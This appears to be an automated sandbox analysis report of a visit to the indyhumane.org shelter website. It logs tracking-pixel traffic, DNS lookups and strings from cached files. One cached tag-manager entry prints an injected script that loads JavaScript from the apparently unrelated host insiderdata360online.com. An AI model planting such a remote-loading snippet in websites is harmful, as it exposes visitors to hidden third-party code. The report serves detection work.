Source: global trafficHTTP traffic detected: GET /tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973169&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973169&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, triggerReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973167&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973169&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1174527456525563&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973169&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=1401480206566122&ev=PageView&dl=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F%23&rl=https%3A%2F%2Findyhumane.org%2F&if=false&ts=1736387973167&sw=1280&sh=1024&v=2.9.179&r=stable&ec=1&o=4126&fbp=fb.1.1736387957086.7343460081337104&ler=empty&cdl=API_unavailable&it=1736387963804&coo=false&dpo=LDU&dpoco=0&dpost=0&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /td/rul/1009911120?random=1736387984394&cv=11&fst=1736387984394&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be5170z8898710595za201zb898710595&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1280&u_h=1024&url=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&ref=https%3A%2F%2Findyhumane.org%2F&label=MtQMCNfdnYoYENCKyOED&hn=www.googleadservices.com&frm=0&tiba=Adoptable%20Cats%20-%20IndyHumane&value=0&did=dZTNiMT&gdid=dZTNiMT&edid=dZTNiMT&bttype=purchase&npa=0&pscdl=noapi&auid=1223850198.1736387954&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&ct_cookie_present=0 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmgi_KaV_vmCIXRWAviJHfF6XtRvGpgrnd-sNzLOh9Yn-8cB-EiNAq9VlvF
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1009911120/?random=827253431&cv=11&fst=1736387984394&bg=ffffff&guid=ON&async=1&gtm=45be5170z8898710595za201zb898710595&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1280&u_h=1024&url=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&ref=https%3A%2F%2Findyhumane.org%2F&label=MtQMCNfdnYoYENCKyOED&hn=www.googleadservices.com&frm=0&tiba=Adoptable%20Cats%20-%20IndyHumane&value=0&did=dZTNiMT&gdid=dZTNiMT&edid=dZTNiMT&npa=0&pscdl=noapi&auid=1223850198.1736387954&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&fmt=3&ct_cookie_present=false&crd=CLHBsQIIsMGxAgixw7ECCIrFsQIIwsmxAgjrxrECCKPFsQIIkcmxAgjTxbECIgEBOAFAAUonZXZlbnQtc291cmNlLCB0cmlnZ2VyPW5hdmlnYXRpb24tc291cmNlYgQKAgID&eitems=ChAIgOH4uwYQvOHXzbKykcElEh0A5ForWTYKymQIZSU9lFFgBKl68EUjtb7LtSkaMw&pscrd=CMu189KkvIn67wEiEwiP4eyoxeeKAxVEoP0HHR64H_MyAggDMgIIBDICCAcyAggIMgIICTICCAoyAggCMgIICzICCBUyAggfMgIIEzICCBI6F2h0dHBzOi8vaW5keWh1bWFuZS5vcmcvQlhDaEVJZ09INHV3WVFzSUxfNjVyYjBwZTNBUkl0QUxLUkpsU1BvRUF3NDlhaVFBb05mclZ3RlB6N3hDbnlOMloxOFpHVGFMTEgzRVlXMUFYcENBN3Q0Wi1S HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUmgi_KaV_vmCIXRWAviJHfF6XtRvGpgrnd-sNzLOh9Yn-8cB-EiNAq9VlvF
Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/1009911120/?random=827253431&cv=11&fst=1736387984394&bg=ffffff&guid=ON&async=1&gtm=45be5170z8898710595za201zb898710595&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1280&u_h=1024&url=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&ref=https%3A%2F%2Findyhumane.org%2F&label=MtQMCNfdnYoYENCKyOED&hn=www.googleadservices.com&frm=0&tiba=Adoptable%20Cats%20-%20IndyHumane&value=0&did=dZTNiMT&gdid=dZTNiMT&edid=dZTNiMT&npa=0&pscdl=noapi&auid=1223850198.1736387954&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&fmt=3&ct_cookie_present=false&crd=CLHBsQIIsMGxAgixw7ECCIrFsQIIwsmxAgjrxrECCKPFsQIIkcmxAgjTxbECIgEBOAFAAUonZXZlbnQtc291cmNlLCB0cmlnZ2VyPW5hdmlnYXRpb24tc291cmNlYgQKAgID&pscrd=CMu189KkvIn67wEiEwiP4eyoxeeKAxVEoP0HHR64H_MyAggDMgIIBDICCAcyAggIMgIICTICCAoyAggCMgIICzICCBUyAggfMgIIEzICCBI6F2h0dHBzOi8vaW5keWh1bWFuZS5vcmcvQlhDaEVJZ09INHV3WVFzSUxfNjVyYjBwZTNBUkl0QUxLUkpsU1BvRUF3NDlhaVFBb05mclZ3RlB6N3hDbnlOMloxOFpHVGFMTEgzRVlXMUFYcENBN3Q0Wi1S&is_vtc=1&cid=CAQSKQCa7L7dPpThu4FgMjo273of32Btk_Y76FbkAgGqXOQdFwnQ1R93Jy03&eitems=ChAIgOH4uwYQvOHXzbKykcElEh0A5ForWWHVhirVqQVViyKq4PplGLKprksXMIr1tA&random=236622740 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/1p-conversion/1009911120/?random=827253431&cv=11&fst=1736387984394&bg=ffffff&guid=ON&async=1&gtm=45be5170z8898710595za201zb898710595&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&u_w=1280&u_h=1024&url=https%3A%2F%2Findyhumane.org%2Fadopt%2Fadoptable-cats%2F&ref=https%3A%2F%2Findyhumane.org%2F&label=MtQMCNfdnYoYENCKyOED&hn=www.googleadservices.com&frm=0&tiba=Adoptable%20Cats%20-%20IndyHumane&value=0&did=dZTNiMT&gdid=dZTNiMT&edid=dZTNiMT&npa=0&pscdl=noapi&auid=1223850198.1736387954&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&capi=1&fmt=3&ct_cookie_present=false&crd=CLHBsQIIsMGxAgixw7ECCIrFsQIIwsmxAgjrxrECCKPFsQIIkcmxAgjTxbECIgEBOAFAAUonZXZlbnQtc291cmNlLCB0cmlnZ2VyPW5hdmlnYXRpb24tc291cmNlYgQKAgID&pscrd=CMu189KkvIn67wEiEwiP4eyoxeeKAxVEoP0HHR64H_MyAggDMgIIBDICCAcyAggIMgIICTICCAoyAggCMgIICzICCBUyAggfMgIIEzICCBI6F2h0dHBzOi8vaW5keWh1bWFuZS5vcmcvQlhDaEVJZ09INHV3WVFzSUxfNjVyYjBwZTNBUkl0QUxLUkpsU1BvRUF3NDlhaVFBb05mclZ3RlB6N3hDbnlOMloxOFpHVGFMTEgzRVlXMUFYcENBN3Q0Wi1S&is_vtc=1&cid=CAQSKQCa7L7dPpThu4FgMjo273of32Btk_Y76FbkAgGqXOQdFwnQ1R93Jy03&eitems=ChAIgOH4uwYQvOHXzbKykcElEh0A5ForWWHVhirVqQVViyKq4PplGLKprksXMIr1tA&random=236622740 HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: indyhumane.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: chromecache_351.2.drString found in binary or memory: "tags":[{"function":"__html","metadata":["map"],"once_per_event":true,"vtp_html":"\n\u003Cscript type=\"text\/gtmscript\"\u003E!function(b,e,f,g,a,c,d){b.fbq||(a=b.fbq=function(){a.callMethod?a.callMethod.apply(a,arguments):a.queue.push(arguments)},b._fbq||(b._fbq=a),a.push=a,a.loaded=!0,a.version=\"2.0\",a.queue=[],c=e.createElement(f),c.async=!0,c.src=g,d=e.getElementsByTagName(f)[0],d.parentNode.insertBefore(c,d))}(window,document,\"script\",\"https:\/\/connect.facebook.net\/en_US\/fbevents.js\");fbq(\"init\",\"1401480206566122\");fbq(\"track\",\"PageView\");\u003C\/script\u003E\n\u003Cnoscript\u003E\u003Cimg height=\"1\" width=\"1\" style=\"display:none\" src=\"https:\/\/www.facebook.com\/tr?id=1401480206566122\u0026amp;ev=PageView\u0026amp;noscript=1\"\u003E\u003C\/noscript\u003E\n","vtp_supportDocumentWrite":false,"vtp_enableIframeMode":false,"vtp_enableEditJsMacroBehavior":false,"tag_id":3},{"function":"__html","metadata":["map"],"once_per_event":true,"vtp_html":"\u003Cscript type=\"text\/gtmscript\"\u003E(function(){var b=document.getElementsByTagName(\"script\")[0],a=document.createElement(\"script\");a.src=\"\/\/insiderdata360online.com\/service\/platform.js?ran\\x3d\"+Math.random();a.type=\"text\/javascript\";a.async=!0;a.defer=!0;b.parentNode.insertBefore(a,b)})();\u003C\/script\u003E","vtp_supportDocumentWrite":false,"vtp_enableIframeMode":false,"vtp_enableEditJsMacroBehavior":false,"tag_id":4}], equals www.facebook.com (Facebook)
Source: chromecache_290.2.dr, chromecache_368.2.dr, chromecache_346.2.dr, chromecache_195.2.drString found in binary or memory: Math.round(q);t["gtm.videoElapsedTime"]=Math.round(f);t["gtm.videoPercent"]=r;t["gtm.videoVisible"]=u;return t},Mk:function(){e=nb()},Kd:function(){d()}}};var Vb=wa(["data-gtm-yt-inspected-"]),LE=["www.youtube.com","www.youtube-nocookie.com"],ME,NE=!1; equals www.youtube.com (Youtube)
Source: chromecache_290.2.dr, chromecache_368.2.dr, chromecache_346.2.dr, chromecache_195.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var k=qC(a,c,e);T(121);if(k["gtm.elementUrl"]==="https://www.facebook.com/tr/")return T(122),!0;if(d&&f){for(var m=yb(b,g.length),n=0;n<g.length;++n)g[n](k,m);return m.done}for(var p=0;p<g.length;++p)g[p](k,function(){});return!0},tC=function(){var a=[],b=function(c){return bb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
Source: chromecache_290.2.dr, chromecache_368.2.dr, chromecache_346.2.dr, chromecache_195.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={Lh:e,Jh:f,Kh:g,si:k,ui:m,af:n,Kb:b},q=A.YT;if(q)return q.ready&&q.ready(d),b;var r=A.onYouTubeIframeAPIReady;A.onYouTubeIframeAPIReady=function(){r&&r();d()};H(function(){for(var u=E.getElementsByTagName("script"),v=u.length,t=0;t<v;t++){var w=u[t].getAttribute("src");if(WE(w,"iframe_api")||WE(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,B=0;B<y;B++)if(!NE&&UE(x[B],p.af))return lc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_358.2.dr, chromecache_375.2.dr, chromecache_354.2.dr, chromecache_337.2.dr, chromecache_396.2.dr, chromecache_257.2.dr, chromecache_261.2.dr, chromecache_201.2.dr, chromecache_402.2.dr, chromecache_351.2.dr, chromecache_386.2.dr, chromecache_336.2.drString found in binary or memory: return b}JE.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),LE=["www.youtube.com","www.youtube-nocookie.com"],ME,NE=!1; equals www.youtube.com (Youtube)
Source: chromecache_393.2.drString found in binary or memory: return function(a,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var b=f.getFbeventsModules("signalsFBEventsGetTier"),c=d();function d(){try{if(a.trustedTypes&&a.trustedTypes.createPolicy){var b=a.trustedTypes;return b.createPolicy("facebook.com/signals/iwl",{createScriptURL:function(b){var c=typeof a.URL==="function"?a.URL:a.webkitURL;c=new c(b);c=c.hostname.endsWith(".facebook.com")&&c.pathname=="/signals/iwl.js";if(!c)throw new Error("Disallowed script URL");return b}})}}catch(a){}return null}e.exports=function(a,d){d=b(d);d=d==null?"www.facebook.com":"www."+d+".facebook.com";d="https://"+d+"/signals/iwl.js?pixel_id="+a;if(c!=null)return c.createScriptURL(d);else return d}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: chromecache_393.2.drString found in binary or memory: return function(f,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var a=/^https:\/\/www\.([A-Za-z0-9\.]+)\.facebook\.com\/tr\/?$/,b=["https://www.facebook.com/tr","https://www.facebook.com/tr/"];e.exports=function(c){if(b.indexOf(c)!==-1)return null;var d=a.exec(c);if(d==null)throw new Error("Malformed tier: "+c);return d[1]}})();return e.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: chromecache_393.2.drString found in binary or memory: return function(f,g,h,i){var j={exports:{}};j.exports;(function(){"use strict";var a={ENDPOINT:"https://www.facebook.com/tr/",INSTAGRAM_TRIGGER_ATTRIBUTION:"https://www.instagram.com/tr/",AEM_ENDPOINT:"https://www.facebook.com/.well-known/aggregated-event-measurement/",GPS_ENDPOINT:"https://www.facebook.com/privacy_sandbox/pixel/register/trigger/",TOPICS_API_ENDPOINT:"https://www.facebook.com/privacy_sandbox/topics/registration/"};j.exports=a})();return j.exports}(a,b,c,d)}); equals www.facebook.com (Facebook)
Source: chromecache_354.2.dr, chromecache_337.2.dr, chromecache_290.2.dr, chromecache_201.2.dr, chromecache_402.2.dr, chromecache_368.2.dr, chromecache_386.2.dr, chromecache_346.2.dr, chromecache_195.2.dr, chromecache_229.2.drString found in binary or memory: var YD=function(a,b,c,d,e){var f=OB("fsl",c?"nv.mwt":"mwt",0),g;g=c?OB("fsl","nv.ids",[]):OB("fsl","ids",[]);if(!g.length)return!0;var k=TB(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);T(121);if(m==="https://www.facebook.com/tr/")return T(122),!0;k["gtm.elementUrl"]=m;k["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(k["gtm.interactedFormName"]=a.getAttribute("name"));e&&(k["gtm.formSubmitElement"]=e,k["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!xA(k,zA(b, equals www.facebook.com (Facebook)
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: indyhumane.org
Source: global trafficDNS traffic detected: DNS query: 149955744.v2.pressablecdn.com
Source: global trafficDNS traffic detected: DNS query: g.petango.com
Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
Source: global trafficDNS traffic detected: DNS query: cdn.customgpt.ai
Source: global trafficDNS traffic detected: DNS query: leatherbook.org
Source: global trafficDNS traffic detected: DNS query: insiderdata360online.com
Source: global trafficDNS traffic detected: DNS query: secure.gaug.es
Source: global trafficDNS traffic detected: DNS query: connect.facebook.net
Source: global trafficDNS traffic detected: DNS query: up.pixel.ad
Source: global trafficDNS traffic detected: DNS query: virtual.urban-orthodontics.com
Source: global trafficDNS traffic detected: DNS query: analytics.google.com
Source: global trafficDNS traffic detected: DNS query: stats.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: pixel.sitescout.com
Source: global trafficDNS traffic detected: DNS query: pixel-sync.sitescout.com
Source: global trafficDNS traffic detected: DNS query: www.facebook.com
Source: global trafficDNS traffic detected: DNS query: dpm.demdex.net
Source: global trafficDNS traffic detected: DNS query: pixel.tapad.com
Source: global trafficDNS traffic detected: DNS query: loadm.exelator.com
Source: global trafficDNS traffic detected: DNS query: idsync.rlcdn.com
Source: global trafficDNS traffic detected: DNS query: sync.crwdcntrl.net
Source: global trafficDNS traffic detected: DNS query: cm.g.doubleclick.net
Source: global trafficDNS traffic detected: DNS query: fei.pro-market.net
Source: global trafficDNS traffic detected: DNS query: image2.pubmatic.com
Source: global trafficDNS traffic detected: DNS query: us-u.openx.net
Source: global trafficDNS traffic detected: DNS query: ib.adnxs.com
Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
Source: unknownHTTP traffic detected: POST /ccm/collect?en=page_view&dl=https%3A%2F%2Findyhumane.org%2F&scrsrc=www.googletagmanager.com&frm=0&rnd=1430938266.1736387954&dt=IndyHumane%20-%20IndyHumane&auid=1223850198.1736387954&navt=n&npa=0&gtm=45He5170v898710595za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&tft=1736387953959&tfd=8745&apve=1 HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://indyhumane.orgX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://indyhumane.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 09 Jan 2025 01:59:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=31536000Vary: Accept-EncodingHost-Header: wpcloudVary: CookieExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://indyhumane.org/wp-json/>; rel="https://api.w.org/"X-ac: 2.jfk _atomic_dca BYPASSAlt-Svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 09 Jan 2025 01:59:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 09 Jan 2025 01:59:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 09 Jan 2025 01:59:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeStrict-Transport-Security: max-age=31536000Vary: Accept-EncodingHost-Header: wpcloudVary: CookieExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://indyhumane.org/wp-json/>; rel="https://api.w.org/"X-ac: 2.jfk _atomic_dca BYPASSAlt-Svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 09 Jan 2025 01:59:26 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: chromecache_388.2.drString found in binary or memory: http://b.scorecardresearch.com/p?c1=2&c2=6745171&c3=&c4=&c5=&c6=&c15=&cj=1
Source: chromecache_366.2.dr, chromecache_401.2.drString found in binary or memory: http://masonry.desandro.com
Source: chromecache_344.2.drString found in binary or memory: http://thrivethemes.com/
Source: chromecache_344.2.drString found in binary or memory: http://www.thrivethemes.com
Source: sets.json.0.drString found in binary or memory: https://07c225f3.online
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_fron
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/carouse
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/themes/indy-humane/style.css?ver=1.0
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/inc/assets/dist/frontend.min.js
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/inc/assets/dist/landingpage-fro
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/style.css?ver=10.4.2
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/style.css?ver=6.7.1
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/themes/thrive-theme/thrive-dashboard/js/dist/fronte
Source: chromecache_388.2.drString found in binary or memory: https://149955744.v2.pressablecdn.com/wp-content/uploads/2021/05/cat-on-bed-1024x475.png
